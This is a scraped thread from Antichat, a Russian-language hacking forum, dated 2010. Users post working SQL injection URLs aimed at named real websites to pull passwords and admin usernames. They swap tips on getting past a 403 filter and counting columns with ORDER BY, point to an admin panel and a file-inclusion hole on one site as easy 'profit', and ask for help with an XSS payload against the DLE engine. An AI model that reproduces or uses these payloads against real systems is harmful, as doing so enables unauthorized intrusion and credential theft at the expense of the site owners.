ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.07.2010, 17:41
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
Сообщение от Seravin
Seravin said:
Код:
Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
|
|
|
14.07.2010, 21:00
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от haito
haito said:
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.
А вот так:
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.
Как обойти?
Код:
Code:
http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+
|
|
|
|
14.07.2010, 22:18
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
|
|
|
|
14.07.2010, 23:11
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Сообщение от 547
547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
там нет ничего
|
|
|
|
14.07.2010, 23:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
можно вопрос? как вы узнали сколько там полей? спасибо.
|
|
|
|
15.07.2010, 00:02
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.
да как всегда, через order by по выводу ошибки
-->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php
|
|
|
|
15.07.2010, 00:19
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Сообщение от Konqi
Konqi said:
можно вопрос? как вы узнали сколько там полей? спасибо.
id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
Здесь есть второй под запрос.
http://www.mobilex.pl/istats5/login.php
http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!
я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo
Остальное за тобой.
|
|
|
|
15.07.2010, 01:12
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от AC//DC
AC//DC said:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
чтобы всё так просто было не постил бы
|
|
|
|
15.07.2010, 14:24
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Сообщение от Gorev
Gorev said:
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты
|
|
|
|
15.07.2010, 15:23
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Есть псивная xss в DLE.
Сообщение от None
site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert( String.fromCharCode(120,115,115))
При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?2251710){kind=avatar}
![Отправить сообщение для NaX[no]rT с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?2251804){kind=avatar}
Похожие темы
Линейный вид
